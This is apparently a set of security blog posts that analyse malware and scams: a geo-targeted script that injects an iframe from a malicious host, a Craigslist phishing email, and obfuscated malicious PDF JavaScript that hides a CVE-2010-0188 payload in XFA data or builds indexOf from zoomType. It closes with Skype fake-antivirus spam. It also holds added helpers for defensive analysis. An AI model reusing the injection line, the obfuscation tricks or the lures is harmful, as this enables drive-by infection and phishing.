Geographical targeting of attacks

Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:

var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;
        break;
    }
}
if(tmpdomain == 0) {
    document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}

The code checks the location of the current document. If the domain does not contain the strings .gov.cn or .edu.cn, then the attack is launched (by dynamically creating an iframe tag), otherwise the script performs no action.
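To see exactly which pages the gate spares, here is an added helper (my analysis code, not the script from the page) that re-implements the gating logic as a pure function so it can be exercised against sample locations offline. It also exposes a side effect of the sample's hard-coded 7-character scheme assumption on https pages.

```javascript
// Added analysis helper (not part of the original post): re-implements the
// gate of the script above as a pure function. The domain list is the sample's.
const SPARED_DOMAINS = [".gov.cn", ".edu.cn"];

// Mirrors the sample exactly, including its assumption that the scheme is
// exactly 7 characters long ("http://"): on an https page, index 7 is the
// slash after the authority, so the extracted "host" is the empty string.
function extractSiteUrl(location) {
  const s = location + "";
  return s.substring(7, s.indexOf("/", 7));
}

// True when the sample would inject the iframe, false when it spares the page.
// The match is a plain substring test, so any host containing ".edu.cn" or
// ".gov.cn" anywhere (not only as its suffix) is spared.
function gateFires(location) {
  const siteUrl = extractSiteUrl(location);
  return !SPARED_DOMAINS.some((d) => siteUrl.indexOf(d) > -1);
}
```

Running the gate over a spared domain served over https shows it firing anyway, because the sample never considers a scheme other than http.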

Certainly not new, but still interesting...


Craigslist phishing

Here is another interesting attack, this one targeting Craigslist users. I've just received an email with the following content:

Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html

Thank you.

Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist:

Phishing site passing for Craigslist

It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.

Stay away from this guy and this site...


Malicious PDF trick: XFA

Another trick that is becoming more and more common in malicious PDF files consists of storing the actual malicious content (for example, JavaScript code that exploits some vulnerability) in XFA forms. If you remember the getPageNthWord, getAnnots, and info tricks documented earlier, you will recognize the technique being used here.

So, what is an XFA form? XFA stands for XML Forms Architecture; it is a specification used to create form templates (forms that can be filled in by a user) and to process them (for example, to validate their contents). Adobe introduced support for XFA forms in PDF files with PDF 1.5. If you want all the gory details, you can refer to the original XFA proposal or to Adobe's XFA specification, which, however, at 1123 pages may be a hard read.

Let's see how it is abused in practice (the MD5 of the sample I'm analyzing is 1f26dcd4520a6965a42cefa4c7641334). The PDF first defines an XFA template, which describes the appearance and interactive characteristics of the form.

obj 10 0
<<
    /Type /EmbeddedFile    
    /Length 618    
    /Filter /FlateDecode 
>>
stream
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
    <subform layout="tb" locale="en_US" name="artsLei">
        <pageSet>
            <pageArea id="leiArts" name="leiArts">
                <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
                <medium long="792pt" short="612pt" stock="default"/>
            </pageArea>
        </pageSet>
        <subform h="756pt" w="576pt " name="docTaut">
            <field h="65mm" name="docArts" w="85mm" x="53.6501mm" y="88.6499mm">
                <event activity="initialize" name="tautDoc">
                    <script contentType="application/x-javascript">
                    var nil = (function(){return this;}).call(null);
                    ...
                    eval_ref(decode(docArts['ra'+ue+'wVa'+ue+'lue'].substring(50),eval_ref));
                    </script>
                </event>
                <ui><imageEdit/></ui>
            </field>
        </subform>
    </subform>
</template>
endstream
endobj

A couple of interesting parts: the template defines a field named docArts. A reference to this field is available through an object named docArts in the global JavaScript scope (i.e., this.docArts is a Field object representing this field). The field also has an event handler for its initialization; the handler is written in JavaScript and has the familiar look of obfuscated code.

Let's see what this code does:

var nil = (function(){return this;}).call(null);
var eval_ref = nil['eval'];
function decode(str, ev){
    var ret = '';
    var cvc = [];
    var fcc = String.fromCharCode;
    var k = docArts['rawValue'].substring(0, 50);
    ...
    return ret;
}
eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));

The interesting bits here are the references to the docArts object. Notice that its rawValue property is retrieved. So, where is the value of the field stored? In an XFA dataset:

obj 12 0
<<   
    /Filter /FlateDecode    
    /Length 3388    
    /Type /EmbeddedFile 
>>
stream
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
    <xfa:data>
        <artsLei>
            <docArts>
            [[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]
            [80,87,70,83,71,77,80,88,16,
             ...
            78,66,74,79,21,86,79,68,8,9,59]
            </docArts>
        </artsLei>
    </xfa:data>
</xfa:datasets>
endstream
endobj

Therefore, the obfuscated JavaScript extracts the data stored for the docArts field (precisely, all the content after the initial 50 characters) and passes it to the decoding routine. The decoding routine also uses the first 50 characters of the docArts data to recover the malicious code in the clear, which is then evaluated. Execution finally results in exploitation of the CVE-2010-0188 vulnerability (libTIFF overflow).
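As an added triage helper (mine, not part of the original analysis and not the sample's code), the following Node.js script correlates the two XFA packets the way the analysis above does: it pulls every event script out of the template together with its enclosing field name, and flags fields whose own script reads their rawValue while the datasets packet carries data for them. The two XML strings are constructed miniatures of objects 10 and 12; the parser is regex-based so the script runs without dependencies and assumes fields are not self-closing.

```javascript
// Added triage helper (not from the original post): correlate an XFA template
// with its datasets packet and flag fields whose own event script reads the
// field's rawValue. Both XML strings are constructed miniatures of objects 10 and 12.
const TEMPLATE_XML = `<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
  <subform name="artsLei"><subform name="docTaut">
    <field name="docArts" h="65mm" w="85mm">
      <event activity="initialize" name="tautDoc">
        <script contentType="application/x-javascript">
          var nil = (function(){return this;}).call(null);
          eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));
        </script>
      </event>
    </field>
    <field name="harmless"><event activity="click">
      <script contentType="application/x-javascript">app.alert("hi");</script>
    </event></field>
  </subform></subform></template>`;
const DATASETS_XML = `<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><artsLei><docArts>[[32,48],[65,97]] [80,87,70,83,71,77]</docArts></artsLei></xfa:data>
</xfa:datasets>`;

// Every <script> body in the template, tagged with the name of its enclosing <field>.
// Regex-based on purpose (no dependencies); assumes fields carrying scripts are not self-closing.
function extractFieldScripts(templateXml) {
  const out = [];
  const fieldRe = /<field\b([^>]*)>([\s\S]*?)<\/field>/g;
  let m;
  while ((m = fieldRe.exec(templateXml)) !== null) {
    const name = (/\bname="([^"]+)"/.exec(m[1]) || [])[1];
    const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/g;
    let s;
    while ((s = scriptRe.exec(m[2])) !== null) out.push({ field: name, script: s[1] });
  }
  return out;
}

// Size of the data stored under a field's name in the datasets packet (0 if absent).
function datasetValueLength(datasetsXml, fieldName) {
  const m = new RegExp(`<${fieldName}\\b[^>]*>([\\s\\S]*?)</${fieldName}>`).exec(datasetsXml);
  return m ? m[1].trim().length : 0;
}

// Fields whose script dereferences <name>.rawValue or <name>['rawValue'] and that
// actually have a payload in the datasets packet: form data doubling as code or key.
function findSelfReadingFields(templateXml, datasetsXml) {
  return extractFieldScripts(templateXml)
    .filter(({ field, script }) =>
      field && new RegExp(`\\b${field}\\s*(\\.rawValue|\\[\\s*['"]rawValue['"]\\s*\\])`).test(script))
    .map(({ field }) => ({ field, dataLength: datasetValueLength(datasetsXml, field) }))
    .filter((r) => r.dataLength > 0);
}
```

On the miniature, only docArts is reported; the click handler on the second field reads no form data and is ignored.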


Malicious PDF trick: zoomType

Here is another small trick that malicious PDFs use. The PDF contains JavaScript code similar to the following:

var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1 = event["tar"+part4]["z"+part3+part3+"m"+part2+part1]; // event.target.zoomType
fun1 = fun1[1]+"nde"+part5; // second character of the zoom type + "ndexOf"
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
    "abcdefghijklmnopqrstuvwxyz" +
    "0123456789"+
    "+/=";

function decode(input) {
    ...
    enc1 = keyStr[fun1](input.charAt(i++));
    ...
}

var code = decode("Q2!#$%^&5a...#$%^&o=!#$%^&");
eval(code);

This script sets up some variables that are used in a decoding routine. As usual, the routine decodes a long string and the result is then interpreted via eval().

The interesting part is how fun1 is computed. Undoing the simple obfuscation shows that it is initialized to event.target.zoomType. Now, event.target is a reference to the Doc object, and the Doc object's zoomType property holds the current zoom type of the document. The documentation lists 7 possible values.

Adobe Reader seems to return FitWidth by default. The next step in the script extracts the second character of the zoom type string (the letter i) and concatenates it with other strings to obtain indexOf.
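To make the environment dependency explicit, here is an added helper (my analysis code, not the sample's) that reproduces the sample's string assembly for each of the seven zoom type values and reports which property name results, without evaluating anything. The seven value strings are those of the Acrobat JavaScript API's zoomtype object; the event object is a minimal stand-in for what an analysis sandbox would provide.

```javascript
// Added analysis helper (not from the original post): resolve fun1 for every
// zoom type and check whether the resulting name is a callable String method.
// Value strings are those of the Acrobat JavaScript API's zoomtype object.
const ZOOM_TYPES = ["NoVary", "FitPage", "FitWidth", "FitHeight",
                    "FitVisibleWidth", "Preferred", "ReflowWidth"];

// Minimal stand-in for Acrobat's event.target (the Doc object); only zoomType is modelled.
function makeEvent(zoomType) {
  return { target: { zoomType } };
}

// Same string assembly as the sample (parts and indexing unchanged), with the
// decoder and eval() left out: we only want the property name fun1 ends up holding.
function resolveFun1(event) {
  var part1 = "pe", part2 = "Ty", part3 = "o", part4 = "get", part5 = "xOf";
  var fun1 = event["tar" + part4]["z" + part3 + part3 + "m" + part2 + part1];
  if (typeof fun1 !== "string") return undefined; // sandbox did not model zoomType
  return fun1[1] + "nde" + part5;
}

// Map each documented zoom type to the name the script would build and
// whether that name exists as a String method the decoder can call.
function zoomTypeOutcomes() {
  return ZOOM_TYPES.map((z) => {
    const name = resolveFun1(makeEvent(z));
    return { zoomType: z, property: name, usable: typeof String.prototype[name] === "function" };
  });
}
```

Only the four Fit* zoom types produce indexOf; under NoVary, Preferred or ReflowWidth the decoder is handed a non-existent method, and a sandbox that leaves zoomType undefined breaks the script before decoding starts.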

A long way to get an i...


More Skype spam

I have been hit by what appears to be yet another round of Skype spam. As has happened before, this attack too seems to be related to fake AV scams.

Here is a screenshot of a contact request I've received today from some notific.alrm.us.13.

Screenshot of the Skype spam message

The full text of the contact request leaves few doubts about the intent of the request:

This is an urgent Security Center Message ! Please click on "Add to Contacts" and follow instructions to update your system ! After adding contact, go to "Conversations" tab, read and follow instructions !

WINDOWS REQUIRES IMMEDIATE ATTENTION URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!

http://www.updatedp.com/

For the link to become active, type it in manually into your web browser !

FULL DETAILS OF SCAN RESULT BELOW


WINDOWS REQUIRES IMMEDIATE ATTENTION

ATTENTION ! Security Center has detected malware on your computer !

Affected Software:

Microsoft Windows 7 Microsoft Windows Vista Microsoft Windows XP Microsoft Windows Server 2003

Impact of Vulnerability: Remote Code Execution / Virus Infection / Unexpected shutdowns

Recommendation: Users running vulnerable version should install a repair utility immediately

Your system IS affected, download the patch from the address below ! Failure to do so may result in severe computer malfunction.

http://www.updatedp.com/

For the link to become active, type it in manually into your web browser!

The advertised domain, www.updatedp.com, currently serves me the default "It works!" page of Apache. Interestingly, that domain has quite a long history of maliciousness (at least all the way back to 2003!).

The following usernames are also likely to be involved in this scam: